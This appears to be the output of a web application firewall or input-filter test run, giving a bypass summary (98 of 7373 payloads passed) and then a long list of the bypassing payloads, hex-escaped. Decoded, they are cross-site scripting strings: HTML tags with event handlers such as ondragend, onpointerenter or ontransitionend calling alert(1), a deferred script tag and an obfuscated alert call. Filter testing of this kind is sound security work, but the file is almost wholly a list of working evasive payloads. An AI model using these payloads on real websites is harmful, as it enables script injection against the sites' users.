================================================================================
File: js_hex.txt - Summary
================================================================================
Total Tested: 7373
Bypassed: 98
Blocked: 7275
Bypass Rate: 1.33%
================================================================================

BYPASSED PAYLOADS:
--------------------------------------------------------------------------------

\x22\x3c\x70\x72\x65\x20\x64\x72\x61\x67\x67\x61\x62\x6c\x65\x3d\x22\x22\x74\x72\x75\x65\x22\x22\x20\x6f\x6e\x64\x72\x61\x67\x65\x6e\x64\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x3e\x74\x65\x73\x74\x3c\x2f\x70\x72\x65\x3e\x22
\x22\x3c\x74\x68\x65\x61\x64\x20\x6f\x6e\x6b\x65\x79\x64\x6f\x77\x6e\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x20\x63\x6f\x6e\x74\x65\x6e\x74\x65\x64\x69\x74\x61\x62\x6c\x65\x3e\x74\x65\x73\x74\x3c\x2f\x74\x68\x65\x61\x64\x3e\x22
\x22\x3c\x74\x62\x6f\x64\x79\x20\x64\x72\x61\x67\x67\x61\x62\x6c\x65\x3d\x22\x22\x74\x72\x75\x65\x22\x22\x20\x6f\x6e\x64\x72\x61\x67\x6c\x65\x61\x76\x65\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x3e\x74\x65\x73\x74\x3c\x2f\x74\x62\x6f\x64\x79\x3e\x22
\x22\x3c\x64\x69\x76\x20\x64\x72\x61\x67\x67\x61\x62\x6c\x65\x3d\x22\x22\x74\x72\x75\x65\x22\x22\x20\x63\x6f\x6e\x74\x65\x6e\x74\x65\x64\x69\x74\x61\x62\x6c\x65\x3e\x64\x72\x61\x67\x20\x6d\x65\x3c\x2f\x64\x69\x76\x3e\x3c\x66\x72\x61\x6d\x65\x20\x6f\x6e\x64\x72\x61\x67\x6f\x76\x65\x72\x3d\x61\x6c\x65\x72\x74\x28\x31\x29\x20\x63\x6f\x6e\x74\x65\x6e\x74\x65\x64\x69\x74\x61\x62\x6c\x65\x3e\x64\x72\x6f\x70\x20\x68\x65\x72\x65\x3c\x2f\x66\x72\x61\x6d\x65\x3e\x22
\x3c\x73\x6f\x75\x72\x63\x65\x20\x6f\x6e\x70\x6f\x69\x6e\x74\x65\x72\x65\x6e\x74\x65\x72\x3d\x61\x6c\x65\x72\x74\x28\x31\x29\x3e\x58\x53\x53\x3c\x2f\x73\x6f\x75\x72\x63\x65\x3e
\x3c\x6d\x65\x6e\x75\x69\x74\x65\x6d\x20\x6f\x6e\x70\x6f\x69\x6e\x74\x65\x72\x6c\x65\x61\x76\x65\x3d\x61\x6c\x65\x72\x74\x28\x31\x29\x3e\x58\x53\x53\x3c\x2f\x6d\x65\x6e\x75\x69\x74\x65\x6d\x3e
\x22\x3c\x70\x20\x6f\x6e\x6d\x6f\x75\x73\x65\x64\x6f\x77\x6e\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x3e\x74\x65\x73\x74\x3c\x2f\x70\x3e\x22
\x22\x3c\x68\x31\x20\x6f\x6e\x63\x6f\x70\x79\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x20\x63\x6f\x6e\x74\x65\x6e\x74\x65\x64\x69\x74\x61\x62\x6c\x65\x3e\x74\x65\x73\x74\x3c\x2f\x68\x31\x3e\x22
\x22\x3c\x6c\x69\x6e\x6b\x20\x6f\x6e\x6b\x65\x79\x70\x72\x65\x73\x73\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x20\x63\x6f\x6e\x74\x65\x6e\x74\x65\x64\x69\x74\x61\x62\x6c\x65\x3e\x74\x65\x73\x74\x3c\x2f\x6c\x69\x6e\x6b\x3e\x22
\x22\x3c\x6f\x6c\x20\x64\x72\x61\x67\x67\x61\x62\x6c\x65\x3d\x22\x22\x74\x72\x75\x65\x22\x22\x20\x6f\x6e\x64\x72\x61\x67\x6c\x65\x61\x76\x65\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x3e\x74\x65\x73\x74\x3c\x2f\x6f\x6c\x3e\x22
\x22\x3c\x63\x6f\x6c\x67\x72\x6f\x75\x70\x20\x64\x72\x61\x67\x67\x61\x62\x6c\x65\x3d\x22\x22\x74\x72\x75\x65\x22\x22\x20\x6f\x6e\x64\x72\x61\x67\x65\x6e\x74\x65\x72\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x3e\x74\x65\x73\x74\x3c\x2f\x63\x6f\x6c\x67\x72\x6f\x75\x70\x3e\x22
\x22\x3c\x73\x74\x79\x6c\x65\x3e\x40\x6b\x65\x79\x66\x72\x61\x6d\x65\x73\x20\x78\x7b\x66\x72\x6f\x6d\x20\x7b\x6c\x65\x66\x74\x3a\x30\x3b\x7d\x74\x6f\x20\x7b\x6c\x65\x66\x74\x3a\x20\x31\x30\x30\x30\x70\x78\x3b\x7d\x7d\x3a\x74\x61\x72\x67\x65\x74\x20\x7b\x61\x6e\x69\x6d\x61\x74\x69\x6f\x6e\x3a\x31\x30\x73\x20\x65\x61\x73\x65\x2d\x69\x6e\x2d\x6f\x75\x74\x20\x30\x73\x20\x31\x20\x78\x3b\x7d\x3c\x2f\x73\x74\x79\x6c\x65\x3e\x3c\x6d\x61\x70\x20\x69\x64\x3d\x78\x20\x73\x74\x79\x6c\x65\x3d\x22\x22\x70\x6f\x73\x69\x74\x69\x6f\x6e\x3a\x61\x62\x73\x6f\x6c\x75\x74\x65\x3b\x22\x22\x20\x6f\x6e\x61\x6e\x69\x6d\x61\x74\x69\x6f\x6e\x63\x61\x6e\x63\x65\x6c\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x3e\x3c\x2f\x6d\x61\x70\x3e\x22
\x22\x3c\x62\x6f\x64\x79\x20\x64\x72\x61\x67\x67\x61\x62\x6c\x65\x3d\x22\x22\x74\x72\x75\x65\x22\x22\x20\x6f\x6e\x64\x72\x61\x67\x65\x6e\x74\x65\x72\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x3e\x74\x65\x73\x74\x3c\x2f\x62\x6f\x64\x79\x3e\x22
\x22\x3c\x73\x74\x72\x69\x6b\x65\x20\x6f\x6e\x63\x6f\x6e\x74\x65\x78\x74\x6d\x65\x6e\x75\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x3e\x74\x65\x73\x74\x3c\x2f\x73\x74\x72\x69\x6b\x65\x3e\x22
\x77\x72\x69\x74\x65\x74\x69\x74\x6c\x65\x28\x29
\x22\x3c\x73\x75\x6d\x6d\x61\x72\x79\x20\x6f\x6e\x6d\x6f\x75\x73\x65\x75\x70\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x3e\x74\x65\x73\x74\x3c\x2f\x73\x75\x6d\x6d\x61\x72\x79\x3e\x22
\x68\x74\x74\x70\x3a\x2f\x2f\x31\x31\x31\x33\x39\x38\x32\x38\x36\x37\x2f
\x22\x3c\x6d\x65\x74\x65\x72\x20\x6f\x6e\x62\x65\x66\x6f\x72\x65\x63\x6f\x70\x79\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x20\x63\x6f\x6e\x74\x65\x6e\x74\x65\x64\x69\x74\x61\x62\x6c\x65\x3e\x74\x65\x73\x74\x3c\x2f\x6d\x65\x74\x65\x72\x3e\x22
\x22\x3c\x73\x20\x6f\x6e\x63\x75\x74\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x20\x63\x6f\x6e\x74\x65\x6e\x74\x65\x64\x69\x74\x61\x62\x6c\x65\x3e\x74\x65\x73\x74\x3c\x2f\x73\x3e\x22
\x22\x3c\x74\x68\x20\x6f\x6e\x6d\x6f\x75\x73\x65\x6c\x65\x61\x76\x65\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x3e\x74\x65\x73\x74\x3c\x2f\x74\x68\x3e\x22
\x22\x3c\x73\x6c\x6f\x74\x20\x6f\x6e\x6d\x6f\x75\x73\x65\x6c\x65\x61\x76\x65\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x3e\x74\x65\x73\x74\x3c\x2f\x73\x6c\x6f\x74\x3e\x22
\x22\x3c\x62\x6f\x64\x79\x20\x64\x72\x61\x67\x67\x61\x62\x6c\x65\x3d\x22\x22\x74\x72\x75\x65\x22\x22\x20\x6f\x6e\x64\x72\x61\x67\x73\x74\x61\x72\x74\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x3e\x74\x65\x73\x74\x3c\x2f\x62\x6f\x64\x79\x3e\x22
\x3c\x73\x65\x6c\x65\x63\x74\x20\x6f\x6e\x70\x6f\x69\x6e\x74\x65\x72\x64\x6f\x77\x6e\x3d\x61\x6c\x65\x72\x74\x28\x31\x29\x3e\x58\x53\x53\x3c\x2f\x73\x65\x6c\x65\x63\x74\x3e
\x22\x3c\x64\x69\x76\x20\x64\x72\x61\x67\x67\x61\x62\x6c\x65\x3d\x22\x22\x74\x72\x75\x65\x22\x22\x20\x63\x6f\x6e\x74\x65\x6e\x74\x65\x64\x69\x74\x61\x62\x6c\x65\x3e\x64\x72\x61\x67\x20\x6d\x65\x3c\x2f\x64\x69\x76\x3e\x3c\x68\x67\x72\x6f\x75\x70\x20\x6f\x6e\x64\x72\x61\x67\x6f\x76\x65\x72\x3d\x61\x6c\x65\x72\x74\x28\x31\x29\x20\x63\x6f\x6e\x74\x65\x6e\x74\x65\x64\x69\x74\x61\x62\x6c\x65\x3e\x64\x72\x6f\x70\x20\x68\x65\x72\x65\x3c\x2f\x68\x67\x72\x6f\x75\x70\x3e\x22
\x74\x6f\x70\x5b\x201c\x61\x6c\x201d\x2b\x201d\x65\x72\x74\x201d\x5d\x28\x31\x29
\x22\x3c\x62\x64\x69\x20\x6f\x6e\x6d\x6f\x75\x73\x65\x6c\x65\x61\x76\x65\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x3e\x74\x65\x73\x74\x3c\x2f\x62\x64\x69\x3e\x22
\x3c\x73\x20\x6f\x6e\x70\x6f\x69\x6e\x74\x65\x72\x6c\x65\x61\x76\x65\x3d\x61\x6c\x65\x72\x74\x28\x31\x29\x3e\x58\x53\x53\x3c\x2f\x73\x3e
\x22\x3c\x72\x70\x20\x64\x72\x61\x67\x67\x61\x62\x6c\x65\x3d\x22\x22\x74\x72\x75\x65\x22\x22\x20\x6f\x6e\x64\x72\x61\x67\x65\x6e\x64\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x3e\x74\x65\x73\x74\x3c\x2f\x72\x70\x3e\x22
\x22\x3c\x53\x43\x52\x49\x50\x54\x20\x44\x45\x46\x45\x52\x3e\x61\x6c\x65\x72\x74\x28\x22\x22\x22\x22\x29\x3c\x2f\x53\x43\x52\x49\x50\x54\x3e\x22
\x22\x3c\x63\x65\x6e\x74\x65\x72\x20\x6f\x6e\x6d\x6f\x75\x73\x65\x6d\x6f\x76\x65\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x3e\x74\x65\x73\x74\x3c\x2f\x63\x65\x6e\x74\x65\x72\x3e\x22
\x22\x3c\x61\x63\x72\x6f\x6e\x79\x6d\x20\x64\x72\x61\x67\x67\x61\x62\x6c\x65\x3d\x22\x22\x74\x72\x75\x65\x22\x22\x20\x6f\x6e\x64\x72\x61\x67\x73\x74\x61\x72\x74\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x3e\x74\x65\x73\x74\x3c\x2f\x61\x63\x72\x6f\x6e\x79\x6d\x3e\x22
\x22\x3c\x64\x69\x76\x20\x64\x72\x61\x67\x67\x61\x62\x6c\x65\x3d\x22\x22\x74\x72\x75\x65\x22\x22\x20\x63\x6f\x6e\x74\x65\x6e\x74\x65\x64\x69\x74\x61\x62\x6c\x65\x3e\x64\x72\x61\x67\x20\x6d\x65\x3c\x2f\x64\x69\x76\x3e\x3c\x75\x6c\x20\x6f\x6e\x64\x72\x6f\x70\x3d\x61\x6c\x65\x72\x74\x28\x31\x29\x20\x63\x6f\x6e\x74\x65\x6e\x74\x65\x64\x69\x74\x61\x62\x6c\x65\x3e\x64\x72\x6f\x70\x20\x68\x65\x72\x65\x3c\x2f\x75\x6c\x3e\x22
\x22\x3c\x63\x6f\x64\x65\x20\x6f\x6e\x6d\x6f\x75\x73\x65\x64\x6f\x77\x6e\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x3e\x74\x65\x73\x74\x3c\x2f\x63\x6f\x64\x65\x3e\x22
\x22\x3c\x73\x68\x61\x64\x6f\x77\x20\x64\x72\x61\x67\x67\x61\x62\x6c\x65\x3d\x22\x22\x74\x72\x75\x65\x22\x22\x20\x6f\x6e\x64\x72\x61\x67\x65\x6e\x74\x65\x72\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x3e\x74\x65\x73\x74\x3c\x2f\x73\x68\x61\x64\x6f\x77\x3e\x22
\x22\x3c\x6b\x62\x64\x20\x64\x72\x61\x67\x67\x61\x62\x6c\x65\x3d\x22\x22\x74\x72\x75\x65\x22\x22\x20\x6f\x6e\x64\x72\x61\x67\x65\x6e\x74\x65\x72\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x3e\x74\x65\x73\x74\x3c\x2f\x6b\x62\x64\x3e\x22
\x22\x3c\x61\x63\x72\x6f\x6e\x79\x6d\x20\x6f\x6e\x6b\x65\x79\x64\x6f\x77\x6e\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x20\x63\x6f\x6e\x74\x65\x6e\x74\x65\x64\x69\x74\x61\x62\x6c\x65\x3e\x74\x65\x73\x74\x3c\x2f\x61\x63\x72\x6f\x6e\x79\x6d\x3e\x22
\x22\x3c\x73\x74\x79\x6c\x65\x3e\x3a\x74\x61\x72\x67\x65\x74\x20\x7b\x63\x6f\x6c\x6f\x72\x3a\x72\x65\x64\x3b\x7d\x3c\x2f\x73\x74\x79\x6c\x65\x3e\x3c\x74\x72\x61\x63\x6b\x20\x69\x64\x3d\x78\x20\x73\x74\x79\x6c\x65\x3d\x22\x22\x74\x72\x61\x6e\x73\x69\x74\x69\x6f\x6e\x3a\x63\x6f\x6c\x6f\x72\x20\x31\x73\x22\x22\x20\x6f\x6e\x74\x72\x61\x6e\x73\x69\x74\x69\x6f\x6e\x65\x6e\x64\x3d\x61\x6c\x65\x72\x74\x28\x31\x29\x3e\x3c\x2f\x74\x72\x61\x63\x6b\x3e\x22
\x3c\x61\x75\x64\x69\x6f\x20\x69\x64\x3d\x78\x20\x74\x61\x62\x69\x6e\x64\x65\x78\x3d\x31\x20\x6f\x6e\x61\x63\x74\x69\x76\x61\x74\x65\x3d\x61\x6c\x65\x72\x74\x28\x31\x29\x3e\x3c\x2f\x61\x75\x64\x69\x6f\x3e
\x22\x3c\x73\x74\x79\x6c\x65\x3e\x3a\x74\x61\x72\x67\x65\x74\x20\x7b\x63\x6f\x6c\x6f\x72\x3a\x72\x65\x64\x3b\x7d\x3c\x2f\x73\x74\x79\x6c\x65\x3e\x3c\x62\x6c\x69\x6e\x6b\x20\x69\x64\x3d\x78\x20\x73\x74\x79\x6c\x65\x3d\x22\x22\x74\x72\x61\x6e\x73\x69\x74\x69\x6f\x6e\x3a\x63\x6f\x6c\x6f\x72\x20\x31\x73\x22\x22\x20\x6f\x6e\x74\x72\x61\x6e\x73\x69\x74\x69\x6f\x6e\x65\x6e\x64\x3d\x61\x6c\x65\x72\x74\x28\x31\x29\x3e\x3c\x2f\x62\x6c\x69\x6e\x6b\x3e\x22
\x22\x3c\x76\x69\x64\x65\x6f\x20\x61\x75\x74\x6f\x70\x6c\x61\x79\x20\x6f\x6e\x6c\x6f\x61\x64\x65\x64\x6d\x65\x74\x61\x64\x61\x74\x61\x3d\x61\x6c\x65\x72\x74\x28\x31\x29\x3e\x20\x3c\x73\x6f\x75\x72\x63\x65\x20\x73\x72\x63\x3d\x22\x22\x76\x61\x6c\x69\x64\x76\x69\x64\x65\x6f\x2e\x6d\x70\x34\x22\x22\x20\x74\x79\x70\x65\x3d\x22\x22\x76\x69\x64\x65\x6f\x2f\x6d\x70\x34\x22\x22\x3e\x3c\x2f\x76\x69\x64\x65\x6f\x3e\x22
\x22\x3c\x73\x68\x61\x64\x6f\x77\x20\x64\x72\x61\x67\x67\x61\x62\x6c\x65\x3d\x22\x22\x74\x72\x75\x65\x22\x22\x20\x6f\x6e\x64\x72\x61\x67\x65\x6e\x64\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x3e\x74\x65\x73\x74\x3c\x2f\x73\x68\x61\x64\x6f\x77\x3e\x22
\x22\x3c\x74\x72\x61\x63\x6b\x20\x6f\x6e\x6d\x6f\x75\x73\x65\x6f\x75\x74\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x3e\x74\x65\x73\x74\x3c\x2f\x74\x72\x61\x63\x6b\x3e\x22
\x22\x3c\x63\x65\x6e\x74\x65\x72\x20\x6f\x6e\x64\x62\x6c\x63\x6c\x69\x63\x6b\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x3e\x74\x65\x73\x74\x3c\x2f\x63\x65\x6e\x74\x65\x72\x3e\x22
\x22\x3c\x73\x74\x79\x6c\x65\x3e\x40\x6b\x65\x79\x66\x72\x61\x6d\x65\x73\x20\x78\x7b\x7d\x3c\x2f\x73\x74\x79\x6c\x65\x3e\x3c\x73\x68\x61\x64\x6f\x77\x20\x73\x74\x79\x6c\x65\x3d\x22\x22\x61\x6e\x69\x6d\x61\x74\x69\x6f\x6e\x2d\x6e\x61\x6d\x65\x3a\x78\x22\x22\x20\x6f\x6e\x61\x6e\x69\x6d\x61\x74\x69\x6f\x6e\x65\x6e\x64\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x3e\x3c\x2f\x73\x68\x61\x64\x6f\x77\x3e\x22
\x22\x3c\x69\x6d\x67\x20\x6f\x6e\x63\x75\x74\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x20\x63\x6f\x6e\x74\x65\x6e\x74\x65\x64\x69\x74\x61\x62\x6c\x65\x3e\x74\x65\x73\x74\x3c\x2f\x69\x6d\x67\x3e\x22
\x22\x3c\x74\x74\x20\x6f\x6e\x6b\x65\x79\x64\x6f\x77\x6e\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x20\x63\x6f\x6e\x74\x65\x6e\x74\x65\x64\x69\x74\x61\x62\x6c\x65\x3e\x74\x65\x73\x74\x3c\x2f\x74\x74\x3e\x22
\x22\x3c\x66\x69\x67\x75\x72\x65\x20\x64\x72\x61\x67\x67\x61\x62\x6c\x65\x3d\x22\x22\x74\x72\x75\x65\x22\x22\x20\x6f\x6e\x64\x72\x61\x67\x65\x6e\x64\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x3e\x74\x65\x73\x74\x3c\x2f\x66\x69\x67\x75\x72\x65\x3e\x22
\x22\x3c\x74\x72\x20\x6f\x6e\x63\x6c\x69\x63\x6b\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x3e\x74\x65\x73\x74\x3c\x2f\x74\x72\x3e\x22
\x22\x3c\x61\x70\x70\x6c\x65\x74\x20\x6f\x6e\x6d\x6f\x75\x73\x65\x64\x6f\x77\x6e\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x3e\x74\x65\x73\x74\x3c\x2f\x61\x70\x70\x6c\x65\x74\x3e\x22
\x22\x3c\x6e\x61\x76\x20\x64\x72\x61\x67\x67\x61\x62\x6c\x65\x3d\x22\x22\x74\x72\x75\x65\x22\x22\x20\x6f\x6e\x64\x72\x61\x67\x65\x6e\x74\x65\x72\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x3e\x74\x65\x73\x74\x3c\x2f\x6e\x61\x76\x3e\x22
\x22\x3c\x64\x6c\x20\x6f\x6e\x6b\x65\x79\x75\x70\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x20\x63\x6f\x6e\x74\x65\x6e\x74\x65\x64\x69\x74\x61\x62\x6c\x65\x3e\x74\x65\x73\x74\x3c\x2f\x64\x6c\x3e\x22
\x22\x3c\x6d\x61\x72\x71\x75\x65\x65\x20\x6f\x6e\x62\x65\x66\x6f\x72\x65\x63\x6f\x70\x79\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x20\x63\x6f\x6e\x74\x65\x6e\x74\x65\x64\x69\x74\x61\x62\x6c\x65\x3e\x74\x65\x73\x74\x3c\x2f\x6d\x61\x72\x71\x75\x65\x65\x3e\x22
\x22\x3c\x73\x70\x61\x6e\x20\x64\x72\x61\x67\x67\x61\x62\x6c\x65\x3d\x22\x22\x74\x72\x75\x65\x22\x22\x20\x6f\x6e\x64\x72\x61\x67\x6c\x65\x61\x76\x65\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x3e\x74\x65\x73\x74\x3c\x2f\x73\x70\x61\x6e\x3e\x22
\x22\x3c\x6c\x65\x67\x65\x6e\x64\x20\x6f\x6e\x6d\x6f\x75\x73\x65\x6d\x6f\x76\x65\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x3e\x74\x65\x73\x74\x3c\x2f\x6c\x65\x67\x65\x6e\x64\x3e\x22
\x22\x3c\x70\x6c\x61\x69\x6e\x74\x65\x78\x74\x20\x6f\x6e\x64\x62\x6c\x63\x6c\x69\x63\x6b\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x3e\x74\x65\x73\x74\x3c\x2f\x70\x6c\x61\x69\x6e\x74\x65\x78\x74\x3e\x22
\x22\x3c\x66\x6f\x6e\x74\x20\x64\x72\x61\x67\x67\x61\x62\x6c\x65\x3d\x22\x22\x74\x72\x75\x65\x22\x22\x20\x6f\x6e\x64\x72\x61\x67\x65\x6e\x74\x65\x72\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x3e\x74\x65\x73\x74\x3c\x2f\x66\x6f\x6e\x74\x3e\x22
\x22\x3c\x62\x64\x69\x20\x64\x72\x61\x67\x67\x61\x62\x6c\x65\x3d\x22\x22\x74\x72\x75\x65\x22\x22\x20\x6f\x6e\x64\x72\x61\x67\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x3e\x74\x65\x73\x74\x3c\x2f\x62\x64\x69\x3e\x22
\x3c\x6d\x65\x74\x65\x72\x20\x6f\x6e\x70\x6f\x69\x6e\x74\x65\x72\x64\x6f\x77\x6e\x3d\x61\x6c\x65\x72\x74\x28\x31\x29\x3e\x58\x53\x53\x3c\x2f\x6d\x65\x74\x65\x72\x3e
\x22\x3c\x62\x75\x74\x74\x6f\x6e\x20\x6f\x6e\x6b\x65\x79\x70\x72\x65\x73\x73\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x20\x63\x6f\x6e\x74\x65\x6e\x74\x65\x64\x69\x74\x61\x62\x6c\x65\x3e\x74\x65\x73\x74\x3c\x2f\x62\x75\x74\x74\x6f\x6e\x3e\x22
\x22\x3c\x68\x65\x61\x64\x20\x6f\x6e\x63\x6f\x70\x79\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x20\x63\x6f\x6e\x74\x65\x6e\x74\x65\x64\x69\x74\x61\x62\x6c\x65\x3e\x74\x65\x73\x74\x3c\x2f\x68\x65\x61\x64\x3e\x22
\x22\x3c\x72\x74\x20\x6f\x6e\x6d\x6f\x75\x73\x65\x6c\x65\x61\x76\x65\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x3e\x74\x65\x73\x74\x3c\x2f\x72\x74\x3e\x22
\x22\x3c\x73\x65\x6c\x65\x63\x74\x20\x6f\x6e\x6d\x6f\x75\x73\x65\x6c\x65\x61\x76\x65\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x3e\x74\x65\x73\x74\x3c\x2f\x73\x65\x6c\x65\x63\x74\x3e\x22
\x22\x3c\x74\x72\x20\x6f\x6e\x6b\x65\x79\x64\x6f\x77\x6e\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x20\x63\x6f\x6e\x74\x65\x6e\x74\x65\x64\x69\x74\x61\x62\x6c\x65\x3e\x74\x65\x73\x74\x3c\x2f\x74\x72\x3e\x22
\x22\x3c\x73\x70\x61\x6e\x20\x6f\x6e\x6b\x65\x79\x75\x70\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x20\x63\x6f\x6e\x74\x65\x6e\x74\x65\x64\x69\x74\x61\x62\x6c\x65\x3e\x74\x65\x73\x74\x3c\x2f\x73\x70\x61\x6e\x3e\x22
\x3c\x70\x69\x63\x74\x75\x72\x65\x20\x6f\x6e\x70\x6f\x69\x6e\x74\x65\x72\x6f\x76\x65\x72\x3d\x61\x6c\x65\x72\x74\x28\x31\x29\x3e\x58\x53\x53\x3c\x2f\x70\x69\x63\x74\x75\x72\x65\x3e
\x22\x3c\x66\x69\x65\x6c\x64\x73\x65\x74\x20\x6f\x6e\x62\x65\x66\x6f\x72\x65\x63\x75\x74\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x20\x63\x6f\x6e\x74\x65\x6e\x74\x65\x64\x69\x74\x61\x62\x6c\x65\x3e\x74\x65\x73\x74\x3c\x2f\x66\x69\x65\x6c\x64\x73\x65\x74\x3e\x22
\x22\x3c\x6d\x65\x74\x65\x72\x20\x6f\x6e\x6d\x6f\x75\x73\x65\x6d\x6f\x76\x65\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x3e\x74\x65\x73\x74\x3c\x2f\x6d\x65\x74\x65\x72\x3e\x22
\x3c\x74\x65\x6d\x70\x6c\x61\x74\x65\x20\x6f\x6e\x70\x6f\x69\x6e\x74\x65\x72\x6c\x65\x61\x76\x65\x3d\x61\x6c\x65\x72\x74\x28\x31\x29\x3e\x58\x53\x53\x3c\x2f\x74\x65\x6d\x70\x6c\x61\x74\x65\x3e
\x22\x3c\x66\x69\x67\x63\x61\x70\x74\x69\x6f\x6e\x20\x64\x72\x61\x67\x67\x61\x62\x6c\x65\x3d\x22\x22\x74\x72\x75\x65\x22\x22\x20\x6f\x6e\x64\x72\x61\x67\x65\x6e\x64\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x3e\x74\x65\x73\x74\x3c\x2f\x66\x69\x67\x63\x61\x70\x74\x69\x6f\x6e\x3e\x22
\x22\x3c\x64\x64\x20\x6f\x6e\x6d\x6f\x75\x73\x65\x65\x6e\x74\x65\x72\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x3e\x74\x65\x73\x74\x3c\x2f\x64\x64\x3e\x22
\x22\x3c\x63\x6f\x6e\x74\x65\x6e\x74\x20\x64\x72\x61\x67\x67\x61\x62\x6c\x65\x3d\x22\x22\x74\x72\x75\x65\x22\x22\x20\x6f\x6e\x64\x72\x61\x67\x6c\x65\x61\x76\x65\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x3e\x74\x65\x73\x74\x3c\x2f\x63\x6f\x6e\x74\x65\x6e\x74\x3e\x22
\x3c\x68\x65\x61\x64\x20\x6f\x6e\x70\x6f\x69\x6e\x74\x65\x72\x65\x6e\x74\x65\x72\x3d\x61\x6c\x65\x72\x74\x28\x31\x29\x3e\x58\x53\x53\x3c\x2f\x68\x65\x61\x64\x3e
\x22\x3c\x6f\x62\x6a\x65\x63\x74\x20\x6f\x6e\x63\x6f\x70\x79\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x20\x63\x6f\x6e\x74\x65\x6e\x74\x65\x64\x69\x74\x61\x62\x6c\x65\x3e\x74\x65\x73\x74\x3c\x2f\x6f\x62\x6a\x65\x63\x74\x3e\x22
\x22\x3c\x64\x69\x76\x20\x64\x72\x61\x67\x67\x61\x62\x6c\x65\x3d\x22\x22\x74\x72\x75\x65\x22\x22\x20\x63\x6f\x6e\x74\x65\x6e\x74\x65\x64\x69\x74\x61\x62\x6c\x65\x3e\x64\x72\x61\x67\x20\x6d\x65\x3c\x2f\x64\x69\x76\x3e\x3c\x68\x72\x20\x6f\x6e\x64\x72\x61\x67\x6f\x76\x65\x72\x3d\x61\x6c\x65\x72\x74\x28\x31\x29\x20\x63\x6f\x6e\x74\x65\x6e\x74\x65\x64\x69\x74\x61\x62\x6c\x65\x3e\x64\x72\x6f\x70\x20\x68\x65\x72\x65\x3c\x2f\x68\x72\x3e\x22
\x22\x3c\x78\x6d\x70\x20\x64\x72\x61\x67\x67\x61\x62\x6c\x65\x3d\x22\x22\x74\x72\x75\x65\x22\x22\x20\x6f\x6e\x64\x72\x61\x67\x6c\x65\x61\x76\x65\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x3e\x74\x65\x73\x74\x3c\x2f\x78\x6d\x70\x3e\x22
